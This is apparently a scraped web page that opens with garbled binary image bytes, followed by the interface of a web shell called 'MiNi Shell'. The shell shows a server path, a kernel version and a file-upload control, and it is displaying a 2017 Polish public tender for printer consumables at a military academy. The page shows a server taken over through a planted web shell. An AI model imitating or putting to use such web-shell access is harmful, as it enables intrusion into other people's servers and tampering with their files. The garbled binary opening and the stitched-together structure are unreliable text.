JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170427/75247-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.akademia.mil.pl' target='_blank'>http://www.akademia.mil.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 75247 - 2017
              z dnia 2017-04-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: SUKCESYWNA DOSTAWA MATERIAŁÓW EKSPLOATACYJNYCH DO URZĄDZEŃ DRUKUJĄCYCH DLA POTRZEB AKADEMII SZTUKI WOJENNEJ.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Akademia Sztuki Wojennej, krajowy numer identyfikacyjny
              011574244, ul.
              al. Gen. A. Chruściela 
              103,
              00-910 
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              261814085, e-mail
              i.lopacinska@akademia.mil.pl, faks
              261813217.
              <br />
              Adres strony internetowej (URL): www.akademia.mil.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Uczelnia publiczna</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.akademia.mil.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />osobiście lub listownie<br />
                Adres:
                <br />Akademia Sztuki Wojennej al. Chruściela 103, 00-910 Warszawa, Punkt Podawczy ASzWoj  budynek nr 4  portiernia (parter)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>SUKCESYWNA DOSTAWA MATERIAŁÓW EKSPLOATACYJNYCH DO URZĄDZEŃ DRUKUJĄCYCH DLA POTRZEB AKADEMII SZTUKI WOJENNEJ.<br /><b>Numer referencyjny: </b>16/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1)Przedmiotem zamówienia jest zakup i sukcesywna dostawa oryginalnych lub równoważnych materiałów eksploatacyjnych do drukarek, kopiarek i sprzętu audio-video  m.in. taśmy, tonery, tusze, folie, papier, cartridge, bębny, pojemniki dla potrzeb Akademii Sztuki Wojennej.
2)Wykaz przykładowych zamawianych materiałów eksploatacyjnych zawiera Załącznik nr 1 do siwz.
3)Produkty wymienione w Załączniku nr 1 do SIWZ -  Formularz ofertowy  stanowią przykładowy zakres potrzeb na materiały eksploatacyjne do drukarek, kopiarek i sprzętu audio-video  sporządzony dla celów  dokonania oceny ofert.
4)Zamawiający zastrzega, sobie prawo zamawiania materiałów wymienionych 
w formularzu ofertowym  w ilościach i zakresie wynikającym z aktualnych potrzeb ASzWoj.
5)Produkty wymienione w załączniku nr 1 do SIWZ będą dostarczane i rozliczane po cenach z formularza ofertowego przez cały okres obowiązywania umowy
6)Ze względu na specyfikę zamówienia i bezwzględny wymóg kompatybilności zaoferowanych asortymentów z posiadanymi przez Zamawiającego urządzeniami drukującymi, przedmiot zamówienia opisano za pomocą znaków towarowych. Uzyskanie asortymentów wysokiej jakości, gwarantuje dalsze sprawne użytkowanie posiadanego sprzętu informatycznego. Zamawiający nie może się odnieść w opisie przedmiotu zamówienia do wskazań art. 30 ust. 2 i 3 ustawy, z powodu braku Polskich Norm lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszącego te normy. 
W związku z powyższym Zamawiający opisał przedmiot zamówienia w oparciu o zapis art. 29 ust. 3 i art. 30 ust. 6 ustawy, dokonując opisu przedmiotu zamówienia poprzez wskazanie znaków towarowych, stawiając wymóg kompatybilności z konkretnym urządzeniem drukującym i określając minimalną wydajność, zgodną ze specyfikacją techniczną producentów urządzeń drukujących.
7)Zamawiający podaje znaki towarowe urządzeń, do których zamawia poszczególne materiały eksploatacyjne, symbol producenta oryginalnych asortymentów wskazując w ten sposób drogę do specyfikacji technicznej" asortymentów oryginalnych. Jednocześnie Zamawiający podaje wymaganą wydajność zamawianych asortymentów, która jest zgodna z wydajnością określoną w tych specyfikacjach.
8)Opisując w ten sposób przedmiot zamówienia Zamawiający dopuszcza zaoferowanie produktów równoważnych, które muszą spełniać wymogi Zamawiającego określone 
w SIWZ. 
9)Zgodnie z art. 30 ust. 5 ustawy obowiązek wykazania równoważności spoczywa na Wykonawcy. Produkty równoważne - to produkty kompatybilne (współpracujące) ze wskazanymi przez Zamawiającego urządzeniami drukującymi, których wydajność jest nie mniejsza niż produktów oryginalnych, wymienionych w Załączniku nr 1 do siwz.
10)Zamawiający za wskaźniki równoważności uzna:
a)kompatybilność - zaoferowany asortyment musi gwarantować niezakłóconą 
i sprawną pracę urządzeń drukujących zgodnie z ich specyfiką i przeznaczeniem.
Potwierdzeniem kompatybilności oferowanych produktów równoważnych będzie oświadczenie Wykonawcy, że oferowane produkty są kompatybilne z urządzeniami drukującymi wskazanymi przez zamawiającego we wszystkich pozycjach zawartych 
w Załączniku nr 1 do siwz.
b)	wydajność   -   wymagana   wydajność   produktów   równoważnych   określona   została przez Zamawiającego na podstawie specyfikacji technicznych producentów materiałów oryginalnych.
11)Żadna z części materiałów równoważnych np.: toner, atrament, tusz, taśma, bęben, kaseta oraz pozostałe części, nie były wykorzystywane w formie pierwotnej w całości lub w części w innym produkcie. Materiały nie mogą mieć śladów poprzedniego używania i uszkodzenia, pochodzące z bieżącej produkcji.
12)W przypadku, gdy produkt oryginalny posiada inteligentny układ elektroniczny (chip) przekazujący informacje o stanie zużycia tuszu lub tonera, to produkt równoważny będący przedmiotem umowy musi posiadać układ analogicznie działający.
13)Nie dopuszcza się oferowania materiałów eksploatacyjnych regenerowanych, oraz poddanych procesowi ponownego napełnienia.
14)Materiały eksploatacyjne muszą posiadać znak firmowy producenta, etykiety zawierające numer katalogowy i termin ważności. Za produkt fabrycznie nowy (nowo wytworzony w całości) i nieregenerowany nie uznaje się wyrobu eksploatowanego wcześniej czy przerabianego, w którym jedynie wyczyszczony został pojemnik i ponownie napełniony czy uzupełniony lub wyrobu wykonanego z zastosowaniem używanych elementów w szczelnej folii i nowym opakowaniu.
15)Przez oryginalne materiały eksploatacyjne Zamawiający rozumie wyłącznie materiały wyprodukowane przez producentów urządzeń wymienionych w Załączniku nr 1 do SIWZ. Materiały oryginalne winny być fabrycznie nowe, posiadać oryginalne opakowanie 
z zabezpieczeniami stosowanymi przez danego producenta (np. hologramy).
16)Zarówno produkty oryginalne jak i równoważne muszą być objęte gwarancją do wyczerpania się środka barwiącego, nie krócej jednak niż 12 miesięcy licząc od daty zamówienia przez Zamawiającego.
17)Zgodnie z art. 25 ust. 1 pkt. 2 Pzp Wykonawca,  który oferuje rozwiązania równoważne jest zobowiązany wykazać, że oferowane przez niego produkty spełniają wymagania określone przez Zamawiającego. W przypadku zaoferowania materiałów eksploatacyjnych równoważnych Wykonawca zobowiązany jest dołączyć do oferty dokumenty potwierdzające równoważność z produktem oryginalnym: 
a)Raporty z testów potwierdzające, że podana wydajność tonerów jest wynikiem przeprowadzenia testów zgodności z normami:  ISO/IEC  19752 dla  tonerów monochromatycznych, ISO/IEC19798 dla  wkładów  do  drukarek  kolorowych ISO/IEC  24712  dla  kolorowych cartridgy  atramentowych   ISO/IEC  24711  dla wkładów z atramentem  w kolorze czarnym (tuszy) wystawione przez niezależny podmiot  posiadający stosowną akredytację w zakresie badania produktów pod kątem spełniania powyższych  norm lub zaświadczenie wystawione przez niezależny podmiot posiadający stosowna akredytację w zakresie badania produktów potwierdzających spełnienie powyższych norm.
18)	W przypadku błędnej pracy lub uszkodzenia urządzeń zamawiającego, spowodowanych zastosowaniem oferowanego materiału, wykonawca zobowiązany będzie do zwrotu kosztów naprawy, na podstawie ekspertyzy wykonanej przez autoryzowany serwis producenta sprzętu. Jeżeli czas naprawy urządzenia przekracza 21 dni, a Zamawiający zgłosi takie żądanie, Wykonawca jest zobowiązany w ciągu 10 dni od zgłoszenia, do dostarczenia sprzętu zamiennego, co najmniej o takich samych parametrach jak urządzenie przekazane do naprawy, w miejsce jego użytkowania na terenie Akademii Sztuki Wojennej.
19)W przypadku stwierdzenia wad w dostarczonych materiałach lub w przypadku niezgodności dostawy ze złożonym zamówieniem Wykonawca wymieni produkty na właściwe, wolne od wad w terminie 10 dni, licząc od dnia następnego po zgłoszeniu przez Zamawiającego.
20)W przypadku częściowej dostawy materiałów  o  wartości powyżej kwoty 10 tys. zł brutto przekazanie towaru do magazynu ASzWoj powinno odbyć się przy udziale przedstawiciela Wykonawcy. 
21)Zapisy towaru na fakturach powinny być zgodne z opisem przedmiotu zamówienia w Załączniku nr 1 do siwz
<br /><br /><b>II.5) Główny kod CPV: </b>30125110-5<br /><b> Dodatkowe kody CPV:</b>30125120-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              249655.55<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca składający ofertę musi wykazać że: zrealizował jako strona umowy, 
w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, jedną umowę na dostawy materiałów eksploatacyjnych do urządzeń drukujących, przy czym wartość tej dostawy  (umowy) była nie mniejsza niż 50.000,00 PLN brutto dla części I i 200.000,00 zł brutto dla części II.
Wykonawca składający ofertę na obie części może wykazać że: zrealizował jako strona umowy, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, jedną umowę na dostawy materiałów eksploatacyjnych do urządzeń drukujących, przy czym wartość tej dostawy  (umowy) była nie mniejsza niż 250.000,00 PLN brutto.
Informacje w zakresie wiedzy i doświadczenia muszą być przedstawione zgodnie 
z załącznikiem nr 4 do SIWZ.
Wykonawca złoży dokumenty potwierdzające, że dostawy zostały wykonane należycie.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2)odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
3)dokumentów dotyczących podmiotu trzeciego, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu  jeżeli wykonawca polega na zasobach podmiotu trzeciego;
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych przez Wykonawcę głównych dostaw wymaganych w rozdziale VI ust. 2 
z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz, których dostawy zostały wykonane - załącznik  nr 4 do SIWZ 
2)Dowody potwierdzające, że dostawy zostały wykonane należycie. Dowodami są:
-referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane;
-oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym
charakterze wykonawca nie jest w stanie uzyskać dokumentów, o których mowa powyżej. Jeśli wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania poświadczenia.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Oświadczenia i dokumenty potwierdzające, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego. 
W przypadku zaproponowania materiałów eksploatacyjnych równoważnych  Wykonawca,   zobowiązany   jest   dołączyć   do   oferty   dokumenty   potwierdzające  równoważność z produktem oryginalnym:  
 - Raporty z testów potwierdzające, że podana wydajność tonerów jest wynikiem  przeprowadzenia testów zgodności z normami: ISO/IEC19752 dla tonerów  monochromatycznych, ISO/IEC 19798 dla wkładów do drukarek kolorowych ISO/IEC 24712 dla kolorowych cartridgy atramentowych ISO/IEC 24711 dla wkładów z atramentem w kolorze czarnym (tuszy) wystawione przez niezależny podmiot posiadający stosowną akredytację w zakresie badania produktów pod kątem spełniania powyższych norm lub zaświadczenie wystawione przez niezależny podmiot posiadający stosowną akredytację w zakresie badania produktów potwierdzające spełnianie powyższych norm.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
